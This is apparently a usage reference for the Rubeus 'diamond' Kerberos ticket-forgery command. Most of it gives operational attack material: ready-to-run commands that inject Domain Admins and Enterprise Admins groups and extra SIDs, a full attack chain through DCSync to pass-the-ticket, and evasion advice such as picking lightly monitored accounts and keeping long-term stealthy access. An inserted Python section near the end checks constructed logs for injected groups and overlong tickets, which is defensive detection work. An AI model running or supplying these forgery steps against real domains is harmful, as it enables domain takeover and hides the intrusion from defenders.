Overview

Create diamond tickets: a ticket forgery technique that starts from a legitimately issued TGT and modifies selected attributes of it before re-encrypting it. Because the ticket originates from a real authentication exchange rather than being forged entirely offline, detection is significantly more challenging than for a traditional golden ticket.

Syntax

Rubeus.exe diamond /user:USER /password:PASSWORD [krbkey] [options]

Authentication Parameters

  • user (string, required): Username for authentication
  • password (string): Password for authentication
  • rc4 (string): RC4/NTLM hash for authentication
  • aes128 (string): AES128 key for authentication
  • aes256 (string): AES256 key for authentication

Kerberos Key Parameters

  • krbkey (string): KRBTGT key used to decrypt and re-encrypt the ticket (AES256 preferred)
  • krbenctype (string): Encryption type of the KRBTGT key (default: aes256)

Modification Options

  • groups (string): Comma-separated list of group RIDs to inject
  • sids (string): Additional SIDs to include in the ticket
  • endtime (string): Custom ticket end time
  • renew (string): Custom ticket renew-till time

Output Options

  • outfile (string): Save the forged ticket to a file
  • ptt (boolean): Pass-the-ticket (inject into the current session immediately)

Examples

# Create diamond ticket with password
Rubeus.exe diamond /user:testuser /password:password123 /krbkey:aes256_key /groups:512

# Create with hash authentication
Rubeus.exe diamond /user:serviceaccount /rc4:ntlm_hash /krbkey:aes256_key /groups:512,519

# Create and inject immediately
Rubeus.exe diamond /user:normaluser /password:pass /krbkey:key /groups:512 /ptt

Technical Overview

Hybrid Approach:
  • Starts with legitimate TGT from real authentication
  • Decrypts legitimate ticket components
  • Modifies specific attributes (groups, privileges)
  • Re-encrypts with legitimate structure
Advantages over Golden Tickets:
  • Uses legitimate authentication patterns
  • Maintains realistic ticket characteristics
  • Harder to detect than purely forged tickets
  • Leverages actual user credentials
Process Steps:
  1. Legitimate Authentication: Request TGT with valid credentials
  2. Ticket Decryption: Decrypt TGT using KDC key material
  3. Attribute Modification: Add privileged groups or SIDs
  4. Re-encryption: Encrypt modified ticket with KDC key
  5. Ticket Injection: Use modified ticket for authentication
Key Requirements:
  • Valid user credentials (password or hash)
  • KDC key material (KRBTGT key)
  • Understanding of ticket structure
  • Proper encryption handling

Credential Requirements

Legitimate Credentials:
  • Valid domain user password
  • User NTLM hash from previous compromise
  • User AES keys from Kerberos operations
  • Any authentication method accepted by KDC
Account Targeting:
  • Low-privilege user accounts (less suspicious)
  • Service accounts with legitimate access
  • Test accounts with known credentials
  • Accounts with minimal monitoring
KRBTGT Key Sources:
  • DCSync attacks against domain controllers
  • Memory dumps from compromised DCs
  • Cached KRBTGT keys from previous operations
  • Golden ticket creation prerequisites
Key Types:
# AES256 preferred for stronger encryption
Rubeus.exe diamond /user:user /password:pass /krbkey:aes256_krbtgt_key

# AES128 alternative
Rubeus.exe diamond /user:user /rc4:hash /krbkey:aes128_krbtgt_key /krbenctype:aes128

# RC4 for legacy compatibility
Rubeus.exe diamond /user:user /password:pass /krbkey:rc4_krbtgt_key /krbenctype:rc4

Privilege Escalation

Administrative Groups:
# Domain Admins
Rubeus.exe diamond /user:lowpriv /password:pass /krbkey:key /groups:512

# Enterprise Admins
Rubeus.exe diamond /user:user /rc4:hash /krbkey:key /groups:519

# Multiple administrative groups
Rubeus.exe diamond /user:user /password:pass /krbkey:key /groups:512,519,520

Group RID Reference:
  • 512: Domain Admins
  • 519: Enterprise Admins
  • 520: Group Policy Creator Owners
  • 518: Schema Admins
  • Custom organizational groups
Additional Privileges:
# Inject custom SIDs
Rubeus.exe diamond /user:user /password:pass /krbkey:key /sids:S-1-5-21-domain-1001,S-1-5-21-domain-1002

# Combine groups and SIDs
Rubeus.exe diamond /user:user /rc4:hash /krbkey:key /groups:512 /sids:S-1-5-21-domain-custom

SID Sources:
  • High-privilege custom groups
  • Service-specific permissions
  • Cross-domain trust relationships
  • Application-specific roles

Operational Advantages

Legitimate Characteristics:
  • Real authentication event logs
  • Valid ticket structure and timing
  • Proper encryption and signatures
  • Normal user authentication patterns
Reduced Indicators:
  • No purely forged ticket artifacts
  • Matches expected user behavior
  • Uses legitimate authentication flows
  • Maintains realistic ticket attributes
Long-term Access:
  • Survives normal password changes (until KRBTGT rotation)
  • Maintains elevated privileges
  • Provides stealth administrative access
  • Supports long-term operations
Flexibility:
  • Use any legitimate user account
  • Modify privilege levels as needed
  • Create multiple variants for different purposes
  • Adapt to changing operational requirements

Integration Workflows

Complete Attack Chain:
# 1. Obtain legitimate user credentials
# Through various attack vectors (phishing, hash dumping, etc.)

# 2. Obtain KRBTGT key material
# Through DCSync or other domain controller compromise

# 3. Create diamond ticket
Rubeus.exe diamond /user:compromised_user /password:known_pass /krbkey:krbtgt_aes256 /groups:512 /ptt

# 4. Use elevated privileges
# Access domain controllers, perform administrative tasks

Low-Profile Operations:
# 1. Use low-privilege account with known credentials
Rubeus.exe diamond /user:testuser /password:simple_pass /krbkey:krbtgt_key /groups:512

# 2. Perform administrative tasks
# Access restricted resources, modify domain objects

# 3. Clean up and return to normal operations
# Remove elevated access, return to baseline

Defensive Considerations

Limited Indicators:
  • Legitimate authentication events
  • Valid ticket structure and encryption
  • Normal user behavior patterns
  • Difficult to distinguish from legitimate access
Detection Opportunities:
  • Unusual privilege escalation patterns
  • Administrative access from low-privilege accounts
  • Ticket analysis for modified attributes
  • Behavioral analysis of user activities
Technical Controls:
  • Regular KRBTGT key rotation
  • Enhanced authentication monitoring
  • Privileged access management (PAM)
  • Ticket inspection and validation
Operational Measures:
  • Regular credential rotation
  • Monitoring for unusual administrative access
  • User behavior analytics
  • Incident response procedures
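Two of the detection opportunities listed above, ticket attributes that do not match the directory and ticket lifetimes that exceed policy, can be checked mechanically. The Python below is an added example and is not code from the Rubeus project or from this page. It runs over constructed records: a hypothetical key=value line format standing in for the Group Membership field of Windows event 4627, a placeholder domain SID, a made-up directory baseline, and an assumed 10-hour maximum TGT lifetime (the Kerberos policy default). It flags privileged RIDs present in a logon token that the account does not hold in the directory, and tickets whose lifetime is longer than a custom /endtime should ever produce under policy.

```python
"""Added example (not part of the Rubeus project): two detection checks that
follow from the page's 'Detection Opportunities'. All input data below is
constructed for illustration; nothing here is real telemetry."""
from datetime import datetime, timedelta

# RIDs of the built-in privileged groups listed in the Group RID Reference.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}

# Constructed directory baseline: account -> set of group RIDs it really holds.
# In practice this comes from AD itself, never from the token being checked.
DIRECTORY_GROUPS = {
    "testuser": {513},          # Domain Users only
    "svc-backup": {513, 1105},  # Domain Users plus a custom group
    "da-admin": {513, 512},     # a genuine Domain Admin
}

# Constructed token-group records (hypothetical key=value format standing in
# for a parsed 4627 event). S-1-5-21-111-222-333 is a placeholder domain SID.
SAMPLE_TOKEN_LOG = """\
2024-05-01T09:12:03Z account=testuser logon_type=3 groups=S-1-5-21-111-222-333-513
2024-05-01T09:14:40Z account=testuser logon_type=3 groups=S-1-5-21-111-222-333-513,S-1-5-21-111-222-333-512
2024-05-01T09:20:11Z account=da-admin logon_type=2 groups=S-1-5-21-111-222-333-513,S-1-5-21-111-222-333-512
2024-05-01T09:31:55Z account=svc-backup logon_type=3 groups=S-1-5-21-111-222-333-513,S-1-5-21-111-222-333-1105,S-1-5-21-111-222-333-519
"""


def parse_token_line(line):
    """Parse one constructed record into (timestamp, account, set of RIDs)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    # The RID is the last dash-separated component of each SID.
    rids = {int(sid.rsplit("-", 1)[1]) for sid in kv["groups"].split(",")}
    return ts, kv["account"], rids


def find_injected_groups(log_text, directory_groups, privileged_rids=PRIVILEGED_RIDS):
    """Return (timestamp, account, group name) for every privileged RID that
    appears in a logon token but not in the account's directory membership.
    A genuine admin's token matches the directory and is not reported."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, account, token_rids = parse_token_line(line)
        held = directory_groups.get(account, set())
        for rid in sorted((token_rids & set(privileged_rids)) - held):
            findings.append((ts, account, privileged_rids[rid]))
    return findings


# Assumption for this example: the domain uses the Kerberos policy default.
MAX_TGT_LIFETIME = timedelta(hours=10)


def find_overlong_tickets(tickets, max_lifetime=MAX_TGT_LIFETIME):
    """tickets: iterable of (account, start_iso, end_iso). Return
    (account, lifetime) for tickets that outlive the policy maximum."""
    out = []
    for account, start, end in tickets:
        lifetime = datetime.fromisoformat(end) - datetime.fromisoformat(start)
        if lifetime > max_lifetime:
            out.append((account, lifetime))
    return out


# Constructed ticket records: one within policy, one with a custom end time.
SAMPLE_TICKETS = [
    ("testuser", "2024-05-01T09:14:40", "2024-05-01T19:14:40"),    # 10 h: within policy
    ("svc-backup", "2024-05-01T09:31:55", "2024-05-11T09:31:55"),  # 10 days: overlong
]

if __name__ == "__main__":
    for finding in find_injected_groups(SAMPLE_TOKEN_LOG, DIRECTORY_GROUPS):
        print("token carries a privileged group not held in the directory:", finding)
    for finding in find_overlong_tickets(SAMPLE_TICKETS):
        print("ticket lifetime exceeds policy:", finding)
```

Both checks depend on a baseline the attacker cannot influence: group membership read from AD itself and the lifetime set in domain policy. Comparing a token against another token would only confirm whatever the modified ticket asserts.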

Troubleshooting

Authentication Failures:
  • Invalid user credentials
  • Account lockout or disabled status
  • Network connectivity problems
  • Domain controller accessibility
Ticket Creation Errors:
  • Incorrect KRBTGT key material
  • Encryption type mismatches
  • Invalid group or SID specifications
  • Timing or format issues
Performance Improvements:
  • Use AES256 encryption for better security
  • Optimize group selections for specific targets
  • Cache KRBTGT keys for repeated use
  • Streamline authentication processes
Success Rate Enhancement:
  • Verify user account status before operation
  • Test KRBTGT key validity
  • Use realistic timing and attribute values
  • Monitor for defensive responses

Related Commands

  • golden - Traditional golden ticket forgery
  • asktgt - Legitimate TGT requests
  • ptt - Inject diamond tickets
  • describe - Analyze ticket structure